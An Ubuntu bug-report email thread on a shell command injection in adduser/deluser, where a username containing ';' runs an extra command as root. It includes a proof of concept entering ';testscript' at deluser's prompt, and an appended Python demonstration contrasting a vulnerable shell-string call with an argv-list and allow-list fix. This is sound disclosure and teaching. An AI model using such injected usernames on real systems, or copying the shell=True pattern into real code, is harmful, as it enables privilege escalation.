Hi,

I have reported this bug to Debian:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Warm regards,
Haoxi

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <marc.deslauri...@canonical.com> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
>        Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
>   adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
>   Incomplete
>
> Bug description:
>   The deluser program is vulnerable to a command injection vulnerability
>   when a user is added via adduser with special characters (such as
>   ';'). It is only possible when the user exists on the system (adduser
>   does not prevent usernames with ';' from being added.)
>
>   This can be a security risk when user accounts on the system can be
>   created from arbitrary input, and there are exploitable programs in
>   PATH to make privilege escalation possible.
>
>   -------------- Proof of concept ----------------
>
>   # ll /test-file
>   ls: cannot access '/test-file': No such file or directory
>
>   # cat /usr/bin/testscript
>   #!/bin/bash
>   touch /test-file
>
>   # deluser
>   Enter a user name to remove: ;testscript
>   no crontab for root
>   crontab: usage error: no arguments permitted after this option
>   usage: crontab [-u user] file
>          crontab [ -u user ] [ -i ] { -e | -l | -r }
>                  (default operation is replace, per 1003.2)
>          -e      (edit user's crontab)
>          -l      (list user's crontab)
>          -r      (delete user's crontab)
>          -i      (prompt before deleting user's crontab)
>   /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code
>   1. Exiting.
>   (failed reverse-i-search)`': deluser^C
>   # ll /test-file
>   -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
>   -------- system description --------
>
>   Description:    Ubuntu 18.04.2 LTS
>   Release:        18.04
>
>   # apt-cache policy adduser
>   adduser:
>     Installed: 3.116ubuntu1
>     Candidate: 3.116ubuntu1
>     Version table:
>    *** 3.116ubuntu1 500
>           500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
>           100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

** Bug watch added: Debian Bug tracker #940577
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1838489

Title:
  adduser & deluser shell command injection

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
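The mechanism behind the report, shown as an added example that is not adduser's or deluser's code (those are Perl; this is a stand-alone Python illustration). Two things are contrasted: splicing a username into a command string that a shell parses, versus passing it as one element of an argv list with no shell, plus an allow-list check that would have rejected a name like `;testscript` at creation time. `echo` stands in for the privileged helper (`crontab -r` in the report), the function names and the `USERNAME_RE` pattern are this example's own choices, and the crafted input is constructed here for the demonstration.

```python
import re
import subprocess
from typing import List

# Allow-list used by this example (an assumption for illustration; a distro's
# adduser.conf NAME_REGEX may be looser or stricter than this).
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def valid_username(name: str) -> bool:
    """True only when the name is built from allow-listed characters.
    ';', quotes, whitespace, '$', '`', '|' and '&' all fail the match."""
    return USERNAME_RE.fullmatch(name) is not None


def run_unsafe(name: str) -> str:
    """VULNERABLE pattern: the name is spliced into a command string that a
    shell parses. 'echo' stands in for the privileged helper (crontab -r in
    the report); the shell still honours ';' as a command separator, so a
    name carrying ';' turns one command into two."""
    result = subprocess.run("echo " + name, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_safe(name: str) -> str:
    """Hardened pattern: argv list, no shell. The whole value reaches the
    program as a single argument, metacharacters included."""
    result = subprocess.run(["echo", name], capture_output=True, text=True)
    return result.stdout


def deluser_commands(name: str) -> List[List[str]]:
    """Gate on the allow-list, then build argv lists for what a deluser-like
    tool would run. Nothing is executed here; a caller would hand each list
    to subprocess.run without shell=True. The command is the crontab removal
    from the report, in the 'crontab [-u user] -r' form its usage text shows."""
    if not valid_username(name):
        raise ValueError(f"refusing unsafe username: {name!r}")
    return [["/usr/bin/crontab", "-u", name, "-r"]]


if __name__ == "__main__":
    # Constructed sample input with the same shape as the report's
    # ';testscript', but a harmless 'echo' as the trailing command.
    crafted = "; echo injected"
    print("unsafe:", repr(run_unsafe(crafted)))   # two lines: '' and 'injected'
    print("safe:  ", repr(run_safe(crafted)))     # one line, the literal value
    print(deluser_commands("alice"))
    try:
        deluser_commands(";testscript")
    except ValueError as exc:
        print("rejected:", exc)
```

The list form fixes the injection regardless of what the username contains; the allow-list is the second half, because deluser only ever sees names that adduser already let into the system, so rejecting metacharacters at creation time closes the path the report describes.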